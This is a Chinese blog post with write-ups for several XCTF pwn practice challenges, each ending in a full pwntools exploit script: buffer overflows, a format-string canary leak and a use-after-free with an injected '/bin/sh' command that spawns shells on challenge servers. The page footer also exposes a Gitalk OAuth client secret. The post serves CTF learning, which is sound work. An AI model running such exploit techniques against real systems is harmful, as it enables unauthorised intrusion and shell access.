<!DOCTYPE html>

<html lang="zh-Hans">

<head><meta name="generator" content="Hexo 3.8.0">
  
  <title>攻防世界自闭之路&lt;高手进阶区&gt; - chessman</title>
  <meta charset="UTF-8">
  <meta name="description" content="辣鸡刘某 在线掉头（发）">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
  
  

  <link rel="shortcut icon" href="/favicon.ico" type="image/png">
  <meta name="description" content="自古有一就有二，有二也不一定有三。鸽子才是本质。">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界自闭之路&lt;高手进阶区&gt;">
<meta property="og:url" content="http://chessman.me/2019/08/23/攻防世界/攻防世界自闭之路二/index.html">
<meta property="og:site_name" content="chessman">
<meta property="og:description" content="自古有一就有二，有二也不一定有三。鸽子才是本质。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://s2.ax1x.com/2019/08/24/mykjgJ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/02/nid579.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/03/nk39Ln.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/03/nkyO2j.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nH4iX6.jpg">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nH4yEF.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nH5QPJ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nH5NVO.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nH5fiQ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/18/nHIEJH.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/09/19/nLLWXF.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/27/KyadLn.png">
<meta property="og:image" content="c:/Users/chessman/AppData/Roaming/Typora/typora-user-images/image-20191027220159274.png">
<meta property="og:updated_time" content="2019-09-17T16:00:00.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="攻防世界自闭之路&lt;高手进阶区&gt;">
<meta name="twitter:description" content="自古有一就有二，有二也不一定有三。鸽子才是本质。">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/08/24/mykjgJ.png">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/gh/nexmoe/nexmoe.github.io@latest/css/style.css,npm/highlight.js@9.15.8/styles/atom-one-dark.css,gh/nexmoe/nexmoe.github.io@latest/lib/mdui_043tiny/css/mdui.css,gh/nexmoe/nexmoe.github.io@latest/lib/iconfont/iconfont.css" crossorigin>
  
  <!--<link rel="stylesheet" href="/css/style.css?v=1586857199553">-->

   
    <style>
      .nexmoe-avatar img:hover {
        -webkit-transform: rotateZ(360deg);
        -moz-transform: rotateZ(360deg);
        transform: rotateZ(360deg);
      }	
    </style>
  
</head>

<body class="mdui-drawer-body-left">
  
  <div id="nexmoe-background">
    <div class="nexmoe-bg" style="background-image: url(https://ww1.yunjiexi.club/2020/04/13/88b19.jpg)"></div>
    <div class="mdui-appbar mdui-shadow-0">
      <div class="mdui-toolbar">
        <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
        <div class="mdui-toolbar-spacer"></div>
        <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
        <a href="/" title="chessman" class="mdui-btn mdui-btn-icon"><img src="https://ww1.yunjiexi.club/2020/04/13/88mzb.jpg" alt="chessman"></a>
       </div>
    </div>
  </div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="chessman">
            <img src="https://ww1.yunjiexi.club/2020/04/13/88mzb.jpg" alt="chessman">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>Articles</span>8</div>
        <div><span>Tags</span>4</div>
        <div><span>Categories</span>0</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/archives" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/about.md" title="关于博客">
            <i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
            <div class="mdui-list-item-content">
                关于博客
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/PY.md" title="我的朋友">
            <i class="mdui-list-item-icon nexmoefont icon-unorderedlist"></i>
            <div class="mdui-list-item-content">
                我的朋友
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        <form id="search_form" action_e="https://cn.bing.com/search?q=site:nexmoe.com" onsubmit="return search();">
            <label><input id="search_value" name="q" type="search" placeholder="Search"></label>
        </form>
    </div>
</div>
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Social</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://github.com/cheemanl" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
  
  

  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Tagcloud</h3>
    <div id="randomtagcloud" class="nexmoe-widget tagcloud nexmoe-rainbow">
      <a href="/tags/ctf/" style="font-size: 16.67px;">ctf</a> <a href="/tags/how2heapc/" style="font-size: 10px;">how2heapc</a> <a href="/tags/wiki/" style="font-size: 13.33px;">wiki</a> <a href="/tags/菜鸡的菜鸡笔记/" style="font-size: 20px;">菜鸡的菜鸡笔记</a>
    </div>
    
  </div>

  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Archive</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 chessman
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-post">
  
      <div class="nexmoe-post-cover" style="padding-bottom: 69.44444444444444%;"> 
          <img data-src="https://ww1.yunjiexi.club/2020/04/13/88b19.jpg" data-sizes="auto" alt="攻防世界自闭之路&lt;高手进阶区&gt;" class="lazyload">
          <h1>攻防世界自闭之路&lt;高手进阶区&gt;</h1>
      </div>
  
  
  <div class="nexmoe-post-meta nexmoe-rainbow" style="margin:10px 0!important;">
    <a><i class="nexmoefont icon-calendar-fill"></i>2019年08月23日</a>
    <a><i class="nexmoefont icon-areachart"></i>1,558 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 6 分钟</a>
</div>

  <div class="nexmoe-post-right">
    
      <div class="nexmoe-fixed">
        <div class="nexmoe-valign">
            <div class="nexmoe-toc">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#dice-game"><span class="toc-number">1.</span> <span class="toc-text">dice_game</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#检查保护"><span class="toc-number">1.1.</span> <span class="toc-text">检查保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp"><span class="toc-number">1.2.</span> <span class="toc-text">完整exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#frogot"><span class="toc-number">2.</span> <span class="toc-text">frogot</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#warmup"><span class="toc-number">3.</span> <span class="toc-text">warmup</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#stack2"><span class="toc-number">4.</span> <span class="toc-text">stack2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#检查保护-1"><span class="toc-number">4.1.</span> <span class="toc-text">检查保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看伪代码"><span class="toc-number">4.2.</span> <span class="toc-text">ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp-1"><span class="toc-number">4.3.</span> <span class="toc-text">完整exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#pwn100"><span class="toc-number">5.</span> <span class="toc-text">pwn100</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Mary-Morton"><span class="toc-number">6.</span> <span class="toc-text">Mary_Morton</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#查看保护"><span class="toc-number">6.1.</span> <span class="toc-text">查看保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看伪代码-1"><span class="toc-number">6.2.</span> <span class="toc-text">ida查看伪代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp-2"><span class="toc-number">6.3.</span> <span class="toc-text">完整exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#time-formatter"><span class="toc-number">7.</span> <span class="toc-text">time-formatter</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#检查保护-2"><span class="toc-number">7.1.</span> <span class="toc-text">检查保护</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ida查看分析代码"><span class="toc-number">7.2.</span> <span class="toc-text">ida查看分析代码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#完整exp-3"><span class="toc-number">7.3.</span> <span class="toc-text">完整exp</span></a></li></ol></li></ol>
            </div>
        </div>
      </div>
    
  </div>

  <article>
    <p>   自古有一就有二，有二也不一定有三。鸽子才是本质。</p>
<a id="more"></a>
<h1 id="dice-game"><a href="#dice-game" class="headerlink" title="dice_game"></a>dice_game</h1><blockquote>
<p>覆盖seed随机值</p>
</blockquote>
<h2 id="检查保护"><a href="#检查保护" class="headerlink" title="检查保护"></a>检查保护</h2><p> <img src="https://s2.ax1x.com/2019/08/24/mykjgJ.png" alt></p>
<p>原函数中的意思是猜50次随机数，才能直接进入函数/bin/sh。在前面一篇的一个题目是一样的解法。主要是缓存区溢出，覆盖seed值，控制随机数。就不多bb了，直接上exp</p>
<h2 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#p =process("./dice_game")</span></span><br><span class="line">p = remote(<span class="string">"111.198.29.45"</span>,<span class="number">38522</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="number">0x40</span> * <span class="string">'A'</span> +p64(<span class="number">0</span>)</span><br><span class="line">p.sendlineafter(<span class="string">":"</span>,payload)</span><br><span class="line"></span><br><span class="line">libc = cdll.LoadLibrary(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)</span><br><span class="line">libc.srand(<span class="number">0</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">50</span>):</span><br><span class="line">	p.sendlineafter(<span class="string">":"</span>,str(libc.rand()%<span class="number">6</span>+<span class="number">1</span>))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="frogot"><a href="#frogot" class="headerlink" title="frogot"></a>frogot</h1><h1 id="warmup"><a href="#warmup" class="headerlink" title="warmup"></a>warmup</h1><blockquote>
<p>基础栈溢出，唯一要注意的点就是就是64位的RBP是8位！</p>
</blockquote>
<p>简单题，其实应该是初级的难度，但是没有附件，所以我拖了很久（懒），才去找的源文件，完整exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = remote(<span class="string">'111.198.29.45'</span>, <span class="number">59566</span>)</span><br><span class="line">payload = <span class="string">'a'</span> * (<span class="number">0x40</span> + <span class="number">8</span>) + p64(<span class="number">0x40060d</span>)</span><br><span class="line"><span class="comment">#p.recvuntil('&amp;gt;')</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="stack2"><a href="#stack2" class="headerlink" title="stack2"></a>stack2</h1><blockquote>
<p>覆盖地址段，跳转到合适的位置</p>
</blockquote>
<p>之前没见过这种解题方法，对于菜单题是真的没做过。我宛如个憨憨，但是理解这道题之后就发现其实真的简单，我看不懂字符串后面的\n是个什么，以为是截断什么鬼的，后来自己拿着别人的payload调试一遍了之后才发现只是一个回车而已= =  我真菜，这么简单的题都不会</p>
<h2 id="检查保护-1"><a href="#检查保护-1" class="headerlink" title="检查保护"></a>检查保护</h2><p> <img src="https://s2.ax1x.com/2019/09/02/nid579.png" alt></p>
<p>开了nx和canary的程序下，应该不是能ROP的题目。那就看看伪代码先</p>
<h2 id="ida查看伪代码"><a href="#ida查看伪代码" class="headerlink" title="ida查看伪代码"></a>ida查看伪代码</h2><p> <img src="https://s2.ax1x.com/2019/09/03/nk39Ln.png" alt></p>
<p>一长段代码里面能看到的这个函数的基本功能是一个计算器的菜单格式，漏洞在再次更改之后的地方。程序没有限制这个的大小就能直接跳转函数的地址偏移，也就是说我不管更改哪里的地址在函数中都是可行的。这道题我以为题解看到这里我就能做了，然后我就去做了，漏洞都找到了，就好办了，我是这么想的。</p>
<p>但是很迷，偏移算不对。理论上来说直接覆盖完栈就可了，直接拿来就算的话就是0x74的值，但是这个不对。题解里面说动态调试，那就现学一波动态调试。ida的动态调试参考<a href="https://blog.csdn.net/abc_670/article/details/80066817" target="_blank" rel="noopener">这篇文章</a> 配置完之后直接用你就能直接动态调试到数据段的值。拿到偏移是0x84，也就是覆盖0x84-0x88的。虽然动态调试了，这个题为什么偏移上的不同还是没有明白。</p>
<p>函数本身就有/bin/bash值，地址为0x0804859b由于存进内存中之后读取地址是反过来的，地址<code>/0x155/0x133/0x04/0x08</code> 。</p>
<p> <img src="https://s2.ax1x.com/2019/09/03/nkyO2j.png" alt></p>
<p>​    但是在环境中有/bin/bash。所以直接改成/bin/sh的值。原来的函数段里面就有system的值。直接利用值就行了。这个没得payload写 就直接放exp算了。</p>
<h2 id="完整exp-1"><a href="#完整exp-1" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">r = remote(<span class="string">"47.96.239.28"</span>, <span class="string">'2333'</span>)</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="string">'1\n5\n3\n132\n80\n3\n133\n132\n3\n134\n4\n3\n135\n8'</span>)</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="string">'3\n140\n135\n3\n141\n137\n3\n142\n4\n3\n143\n8'</span>)</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="string">'5'</span>)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="pwn100"><a href="#pwn100" class="headerlink" title="pwn100"></a>pwn100</h1><blockquote>
<p>憨憨，是憨憨啊。是一个看不懂怎么写题得憨憨啊</p>
</blockquote>
<h1 id="Mary-Morton"><a href="#Mary-Morton" class="headerlink" title="Mary_Morton"></a>Mary_Morton</h1><blockquote>
<p>有两个漏洞，题目里面都表明了，用其中一个做就做的出，所以我选择容易的格式化字符串漏洞。是的，就是因为我菜到不会绕过canary</p>
</blockquote>
<p>真实菜，没做过算64位anary偏移的题，一直觉得应该直接覆盖缓存区就行，其实还有个六个寄存器的偏移，我都没算。</p>
<p><img src="https://s2.ax1x.com/2019/09/18/nH4iX6.jpg" style="zoom:67%;"></p>
<h2 id="查看保护"><a href="#查看保护" class="headerlink" title="查看保护"></a>查看保护</h2><p>拿到题目看保护，没毛病。NX和Canary。用栈溢出不好做（确信）</p>
<p> <img src="https://s2.ax1x.com/2019/09/18/nH4yEF.png" alt></p>
<h2 id="ida查看伪代码-1"><a href="#ida查看伪代码-1" class="headerlink" title="ida查看伪代码"></a>ida查看伪代码</h2><p>在代码里面就可以很明显的看见题目提示给的栈溢出和格式化字符串漏洞</p>
<p> <img src="https://s2.ax1x.com/2019/09/18/nH5QPJ.png" alt></p>
<p>然后再去代码里面看看漏洞问题</p>
<p> <img data-sizes="auto" data-src="https://s2.ax1x.com/2019/09/18/nH5NVO.png" alt="格式化字符串" class="lazyload"></p>
<p> <img data-sizes="auto" data-src="https://s2.ax1x.com/2019/09/18/nH5fiQ.png" alt="栈溢出" class="lazyload"></p>
<p>其实函数就是这么个函数，就很明显，对吧。但是我们找到了点不一样的，这程序里面有这个！！！直接利用漏洞，地址进入到这个函数就行了。同时得到sys的地址（0x4008da）</p>
<p><img src="https://s2.ax1x.com/2019/09/18/nHIEJH.png" alt></p>
<p>然后计算偏移的值，由于我们已知程序有cancry保护，所以我们在绕过cancry偏移的时候可以用字符串漏洞泄露cancry。</p>
<p><img src="https://s2.ax1x.com/2019/09/19/nLLWXF.png" alt></p>
<p>偏移地址为5。由于buf的大小为0x90，且canary的值在buf的底部。正常来算偏移值的话应该是(0x90-0x08)/8<code>[（buf的大小-cancry的值）除去64的位数]</code> 但是由于64位运用寄存器传参，导致偏移值为17+6。</p>
<p>泄露地址之后再去用栈溢出漏洞来交互payload，定位到sub_0x004008da的地址</p>
<h2 id="完整exp-2"><a href="#完整exp-2" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'111.198.29.45'</span>,<span class="string">'38493'</span>)</span><br><span class="line"><span class="comment"># = process('./Mary_Morton')</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">sys = p64(<span class="number">0x04008DA</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'3. Exit the battle \n'</span>,<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">"%23$p"</span>)</span><br><span class="line">p.recvuntil(<span class="string">'0x'</span>)</span><br><span class="line"></span><br><span class="line">cc = p.recv(<span class="number">16</span>)</span><br><span class="line">c = int(cc,<span class="number">16</span>)</span><br><span class="line"><span class="keyword">print</span> hex(c)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"3. Exit the battle \n"</span>,<span class="string">"1"</span>)</span><br><span class="line">payload = <span class="string">'a'</span> * <span class="number">0x88</span> + p64(c) + <span class="string">'a'</span>*<span class="number">8</span>  + sys</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="time-formatter"><a href="#time-formatter" class="headerlink" title="time-formatter"></a>time-formatter</h1><p>uaf漏洞，在liveoverflow的视频里面有说过。算是一个入门题，可以直接写入/bin/sh拿到程序的值，你可以选择一个堆块或者两个堆块来解决问题</p>
<h2 id="检查保护-2"><a href="#检查保护-2" class="headerlink" title="检查保护"></a>检查保护</h2><p> <img src="https://s2.ax1x.com/2019/10/27/KyadLn.png" alt></p>
<p>保护很多，但是没有关系，这是个憨憨堆题</p>
<h2 id="ida查看分析代码"><a href="#ida查看分析代码" class="headerlink" title="ida查看分析代码"></a>ida查看分析代码</h2><p>程序中一共有5个函数，</p>
<p> <img src="C:\Users\chessman\AppData\Roaming\Typora\typora-user-images\image-20191027220159274.png" alt></p>
<p>在查看代码之后就会发现这个题目的漏洞是在uaf，在退出之前会free堆块。所以存在UAF漏洞</p>
<h2 id="完整exp-3"><a href="#完整exp-3" class="headerlink" title="完整exp"></a>完整exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.update(arch=<span class="string">'amd64'</span>, log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">'111.198.29.45'</span>, <span class="number">52258</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_format</span><span class="params">(s)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'&gt;'</span>, <span class="string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">':'</span>, s)</span><br><span class="line">    p.recvuntil(<span class="string">'set'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_zone</span><span class="params">(s)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'&gt;'</span>, <span class="string">'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">':'</span>, s)</span><br><span class="line">    p.recvuntil(<span class="string">'set'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">print_time</span><span class="params">()</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'&gt;'</span>, <span class="string">'4'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">_exit</span><span class="params">()</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'&gt;'</span>, <span class="string">'5'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">'?'</span>, <span class="string">'N'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    set_format(<span class="string">'%p'</span>)</span><br><span class="line">    _exit()</span><br><span class="line">    set_zone(<span class="string">'%Y\';/bin/sh\''</span>)</span><br><span class="line">    print_time()</span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure>

  </article>

  <div class="nexmoe-post-meta nexmoe-rainbow">
    
    
        <a class="nexmoefont icon-tag-fill -link" href="/tags/ctf/">ctf</a>
    
</div>

  <div class="nexmoe-post-footer">
    
      
  <div class="nexmoe-post-copyright">
    <strong>Author：</strong>chessman<br>
    <strong>Link：</strong><a href="http://chessman.me/2019/08/23/攻防世界/攻防世界自闭之路二/" title="http://chessman.me/2019/08/23/攻防世界/攻防世界自闭之路二/" target="_blank" rel="noopener">http://chessman.me/2019/08/23/攻防世界/攻防世界自闭之路二/</a><br>
    
      <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可
    
  </div>


    
    <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
  </div>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/combine/npm/lazysizes@5.1.0/lazysizes.min.js,gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js,npm/mdui@0.4.3/dist/js/mdui.min.js,gh/nexmoe/nexmoe.github.io@latest/js/app.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
<!--<script src="/js/app.js?v=1586857199565"></script>-->


    <script src="https://cdn.jsdelivr.net/gh/xtaodada/xtaodada.github.io@0.0.2/copy.js"></script>


 
<script> 
!function(e,t,a){function n(){c(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"),o(),r()}function r(){for(var e=0;e<d.length;e++)d[e].alpha<=0?(t.body.removeChild(d[e].el),d.splice(e,1)):(d[e].y--,d[e].scale+=.004,d[e].alpha-=.013,d[e].el.style.cssText="left:"+d[e].x+"px;top:"+d[e].y+"px;opacity:"+d[e].alpha+";transform:scale("+d[e].scale+","+d[e].scale+") rotate(45deg);background:"+d[e].color+";z-index:99999");requestAnimationFrame(r)}function o(){var t="function"==typeof e.onclick&&e.onclick;e.onclick=function(e){t&&t(),i(e)}}function i(e){var a=t.createElement("div");a.className="heart",d.push({el:a,x:e.clientX-5,y:e.clientY-5,scale:1,alpha:1,color:s()}),t.body.appendChild(a)}function c(e){var a=t.createElement("style");a.type="text/css";try{a.appendChild(t.createTextNode(e))}catch(t){a.styleSheet.cssText=e}t.getElementsByTagName("head")[0].appendChild(a)}function s(){return"rgb("+~~(255*Math.random())+","+~~(255*Math.random())+","+~~(255*Math.random())+")"}var d=[];e.requestAnimationFrame=function(){return e.requestAnimationFrame||e.webkitRequestAnimationFrame||e.mozRequestAnimationFrame||e.oRequestAnimationFrame||e.msRequestAnimationFrame||function(e){setTimeout(e,1e3/60)}}(),n()}(window,document);
</script>

  





</body>

</html>
